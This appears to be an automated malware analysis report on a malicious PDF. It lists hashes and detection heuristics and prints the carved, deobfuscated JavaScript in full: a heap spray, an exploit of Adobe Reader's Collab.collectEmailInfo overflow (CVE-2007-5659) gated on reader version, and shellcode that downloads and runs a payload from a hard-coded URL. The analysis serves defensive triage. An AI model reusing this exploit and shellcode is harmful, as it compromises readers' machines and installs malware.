Malicious PDF — malware analysis report

Static analysis result for SHA-256 8bbf5197be5d6744…

Verdict: MALICIOUS
File type: PDF
Size: 8.3 KB
First seen: 2026-05-08
MD5: 54ce852cfed513185f2a2286e897b6b6
SHA-1: ed3811dde80df65a204ea7310cb29584ac8214d8
SHA-256: 8bbf5197be5d674419f1d6190a5202ff079bb305c37a57a6b85934d13f116d0e
Risk Score: 266

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains multiple embedded JavaScript streams, some of which are obfuscated using String.fromCharCode and other techniques. The heuristics indicate that these scripts are designed to download and execute further malicious content. The presence of multiple obfuscated JavaScript artifacts suggests a downloader or dropper functionality, but the specific payload or target is not discernible from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (9)

  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; CVE match: exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action (severity: low; 4 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE)
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script:
    var I___wM_3 = new Array();var Cx6_rF65Gv_rUTp = 0;var NS_cN70 = "";function a111lO54(D_5_f63k56A_4, K__MQOD_PxS_u){var FB_jw1T_GAi = K__MQOD_PxS_u.toString();var ri_I1S__7 = "";for(var k_I2Wb = 0; k_I2Wb < FB_jw1T_GAi.length; k_I2Wb++) {var h3_3tk6k = parseInt(FB_jw1T_GAi.substr(k_I2Wb, 1));if (!isNaN(h3_3tk6k)) {h3_3tk6k = h3_3tk6k.toString(16);if (h3_3tk6k.length == 1) { h3_3tk6k = "0" + h3_3tk6k; }else if (h3_3tk6k.length != 2) { h3_3tk6k = "00"; }ri_I1S__7 = h3_3tk6k + ri_I1S__7;}}while(ri_ …
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL (severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive (severity: low; rule: PDF_FOXIT_SYNCANNOTSCAN)
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://mysterio.info/cgi-bin/worker/z002106201r0019R11b04a95Xa9e64b76Y2d6500f6Z0100f060 (referenced by PDF JavaScript)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename: javascript_obj0004_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 4 at offset 0xE1
Size: 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
    var result = "";
    var list = str.split(',');
    for (var i=0; i < list.length; i++) {
        result += String.fromCharCode(list[i] - jump);
    }
    return result;
}
Filename: numeric_charcode_stage_000.js
Kind: deobfuscated-js
Source: numeric char-code string decoded JavaScript at offset 0xEF
Size: 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
Filename: legacy_pdfkit_stage_000.js
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x1B93
Size: 1812 bytes
SHA-256: f063fde98313af9ddb6133640d349ea6a609304447d7bd626b7899af6c5bbe70
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function C0o_Jsl_j(H8_x57g_0, mI_oC_B_A){var d_5__K4tN__i = 0;var n_1_5D_TL2_yNl = 4;var l_F6sD1_p_0m = new Array();var rHCL__m = new Array(107,256,101,  512, 106, 126,  44,405, 142);var t__M6_2_7ERCo = "";rHCL__m[5] -= 103;try {var Jh__otnh6V = 0;if (app) {mI_oC_B_A = pr[Jh__otnh6V].subject;}} catch(e) {}d_5__K4tN__i = this;if (!H8_x57g_0) { l_F6sD1_p_0m[0] = 0;l_F6sD1_p_0m[1] = l_F6sD1_p_0m[0];l_F6sD1_p_0m[2] = l_F6sD1_p_0m[1];l_F6sD1_p_0m[3] = l_F6sD1_p_0m[2];var c__WpO_OyfD__e = rHCL__m[6] + 3;var J5y74eVd_1F8X = c__WpO_OyfD__e + 11;var Q_7WT_vSkM_Jm = C0o_Jsl_j;var t6_b___b = 0;Q_7WT_vSkM_Jm = Q_7WT_vSkM_Jm.toString();for(var p_J_5u5sBRPF86 = 0; p_J_5u5sBRPF86 < Q_7WT_vSkM_Jm.length; p_J_5u5sBRPF86++) {var j__231_Bg_w = Q_7WT_vSkM_Jm.charCodeAt(p_J_5u5sBRPF86);if (j__231_Bg_w > c__WpO_OyfD__e && j__231_Bg_w < J5y74eVd_1F8X) {if (t6_b___b == 4) {t6_b___b = 0;}l_F6sD1_p_0m[t6_b___b] += j__231_Bg_w;if (l_F6sD1_p_0m[t6_b___b] > rHCL__m[3]) {l_F6sD1_p_0m[t6_b___b] -= 512;}t6_b___b++;}}}else  { l_F6sD1_p_0m = H8_x57g_0;}for (var UWBe2_qfA08 = 0; UWBe2_qfA08 < 4; UWBe2_qfA08++) {if (l_F6sD1_p_0m[UWBe2_qfA08] > rHCL__m[1]) {l_F6sD1_p_0m[UWBe2_qfA08] -= rHCL__m[1];}}var q__g5___I1nm = 0;var VFKMT_t_a26er7 = 0;var k_x2TnmDw0A38_f;var KR_m464a_8BOCv = 0;while ( q__g5___I1nm < mI_oC_B_A.length ) {var W54NIBRCads = "";W54NIBRCads = mI_oC_B_A.substr(q__g5___I1nm, 2);var NWCt_vu3VYi = parseInt(W54NIBRCads, rHCL__m[5]); if (VFKMT_t_a26er7 == 4) {VFKMT_t_a26er7 = 0;}NWCt_vu3VYi -= (KR_m464a_8BOCv + 2) * l_F6sD1_p_0m[VFKMT_t_a26er7];if (NWCt_vu3VYi < 0) {NWCt_vu3VYi -= Math.floor(NWCt_vu3VYi / rHCL__m[1]) * rHCL__m[1];}t__M6_2_7ERCo += String.fromCharCode(NWCt_vu3VYi);{q__g5___I1nm += 2;KR_m464a_8BOCv++;VFKMT_t_a26er7++;}}d_5__K4tN__i["eval"](t__M6_2_7ERCo);return 0;}

	C0o_Jsl_j(0);
Filename: legacy_pdfkit_stage_001.js
Kind: deobfuscated-js
Source: annotation-subject callee-key decoded JavaScript at offset 0x4BB
Size: 4920 bytes
SHA-256: 7e9a722de6cc0e8ee52d417c8b86c4daf5eaa61770973ebb7e15d9ef8b73f672
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var I___wM_3 = new Array();var Cx6_rF65Gv_rUTp = 0;var NS_cN70 = "";function a111lO54(D_5_f63k56A_4, K__MQOD_PxS_u){var FB_jw1T_GAi = K__MQOD_PxS_u.toString();var ri_I1S__7 = "";for(var k_I2Wb = 0; k_I2Wb < FB_jw1T_GAi.length; k_I2Wb++) {var h3_3tk6k = parseInt(FB_jw1T_GAi.substr(k_I2Wb, 1));if (!isNaN(h3_3tk6k)) {h3_3tk6k = h3_3tk6k.toString(16);if (h3_3tk6k.length == 1) { h3_3tk6k = "0" + h3_3tk6k; }else if (h3_3tk6k.length != 2) { h3_3tk6k = "00"; }ri_I1S__7 = h3_3tk6k + ri_I1S__7;}}while(ri_I1S__7.length < 8) { ri_I1S__7 = "0" + ri_I1S__7; }var FXD4KF8o0cd4AB = D_5_f63k56A_4.toString(16);if (FXD4KF8o0cd4AB.length == 1) { FXD4KF8o0cd4AB = "0" + FXD4KF8o0cd4AB; }else if (FXD4KF8o0cd4AB.length != 2) { FXD4KF8o0cd4AB = "00"; }ri_I1S__7 = "3" + FXD4KF8o0cd4AB + "P" + ri_I1S__7;return ri_I1S__7;}function yi7bR4(jBf6RXN, O5uhT___3L_f1R){var m1M7_4t_pkD23c = new Array("");var ck3_KGE0 = jBf6RXN;var L_Na52_T3Y8J;if ((L_Na52_T3Y8J = jBf6RXN.lastIndexOf("%u00")) != -1) {if (L_Na52_T3Y8J + 6 == jBf6RXN.length) {m1M7_4t_pkD23c[0] = jBf6RXN.substr(L_Na52_T3Y8J + 4, 2);ck3_KGE0 = jBf6RXN.substring(0, L_Na52_T3Y8J);}}L_Na52_T3Y8J = 1;for (k_I2Wb = 0; k_I2Wb < O5uhT___3L_f1R.length; k_I2Wb++) {var V0Y_SvufV7RI6 = O5uhT___3L_f1R.charCodeAt(k_I2Wb).toString(16);if (V0Y_SvufV7RI6.length == 1) { V0Y_SvufV7RI6 = "0" + V0Y_SvufV7RI6; }m1M7_4t_pkD23c[L_Na52_T3Y8J] = V0Y_SvufV7RI6;L_Na52_T3Y8J++;}k_I2Wb = m1M7_4t_pkD23c[0].length ? 0 : 1;m1M7_4t_pkD23c[L_Na52_T3Y8J] = "00";m1M7_4t_pkD23c[L_Na52_T3Y8J + 1] = "00";L_Na52_T3Y8J += 2;if ((m1M7_4t_pkD23c.length - k_I2Wb) % 2) {m1M7_4t_pkD23c[L_Na52_T3Y8J] = "00";}while(k_I2Wb < m1M7_4t_pkD23c.length) {ck3_KGE0 += "%u" + m1M7_4t_pkD23c[k_I2Wb + 1] + m1M7_4t_pkD23c[k_I2Wb];k_I2Wb += 2;}ck3_KGE0 += "%u0000";return ck3_KGE0;}function m__I_i(d74p2y, cVW72_17L){while (d74p2y.length*2<cVW72_17L) {d74p2y += d74p2y;}d74p2y = d74p2y.substring(0,cVW72_17L/2);return d74p2y;}function i_yBY3D4_Fq(X_3Shl_aFx, qCF5KPXja8ON, WAI8w2__O_Bw__m){var F_O21rTrB = 0x0c0c0c0c;var d74p2y = unescape(qCF5KPXja8ON);var O5uhT___3L_f1R = a111lO54(X_3Shl_aFx, WAI8w2__O_Bw__m);var W_vo_a__L = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var jBf6RXN = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6f70%u7462%u004b%u7468%u7074%u2f3a%u6d2f%u7379%u6574%u6972%u2e6f%u6e69%u6f66%u632f%u6967%u622d%u6e69%u772f%u726f%u656b%u2f72%u307a%u3230%u3031%u3236%u3130%u3072%u3130%u5239%u3131%u3062%u6134%u3539%u6158%u6539%u3436%u3762%u5936%u6432%u3536%u3030%u3666%u305a%u3031%u6630%u3630%u0030";app.W_egoL_E_Y2 = unescape(yi7bR4(jBf6RXN, O5uhT___3L_f1R));var V__pfy_WEr1 = 0x400000;var P_YFG_V_F17 = W_vo_a__L.length * 2;var cVW72_17L = V__pfy_WEr1 - (P_YFG_V_F17+0x38);d74p2y = m__I_i(d74p2y, cVW72_17L);var aO_1_8W = (F_O21rTrB - 0x400000)/V__pfy_WEr1;for (var R_MI__bk = 0; R_MI__bk < aO_1_8W; R_MI__bk++) {I___wM_3[R_MI__bk] = d74p2y + W_vo_a__L;}}function e7q2Ev(){var B8WUsLLM_Vpq = "";for (k_I2Wb = 0; k_I2Wb < 12; k_I2Wb++) {B8WUsLLM_Vpq += unescape("%u0c0c%u0c0c");}var D_c_3N = "";for (k_I2Wb = 0; k_I2Wb < 750; k_I2Wb++) {D_c_3N += B8WUsLLM_Vpq;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: D_c_3N});app.clearTimeOut(Cx6_rF65Gv_rUTp);}function J6VELle_X_p4(rOY_fuBGf51GHn){var NTDX_glfIlg_7 = Cx6_rF65Gv_rUTp;if ((rOY_fuBGf51GHn >= 8 && rOY_fuBGf51GHn < 8.11) || rOY_fuBGf51GHn < 7.1) {i_yBY3D4_Fq(23, "%u0c0c%u0c0c", rOY_fuBGf51GHn);e7q2Ev();}if (NTDX_glfIlg_7) {app.clearTimeOut(NTDX_glfIlg_7);}}var WAI8w2__O_Bw__m = 0;var bOP_G4Ba__C1_i = app.plugIns;for (var eay8Mjbt = 0; eay8Mjbt < bOP_G4Ba__C1_i.length; eay8Mjbt++) {var X6j58_Lu = bOP_G4Ba__C1_i[eay8Mjbt].version;if (X6j58_Lu > WAI8w2__O_Bw__m) { WAI8w2__O_Bw__m = X6j58_Lu; }}if (app.viewerVersion == 9.103 && WAI8w2__O_Bw__m < 9.13) {WAI8w2__O_Bw__m = 9.13;}app.bQD_vIk = J6VELle_X_p4;Cx6_rF65Gv_rUTp = app.setTimeOut("app.bQD_vIk(" + WAI8w2__O_Bw__m.toString() + ")", 50);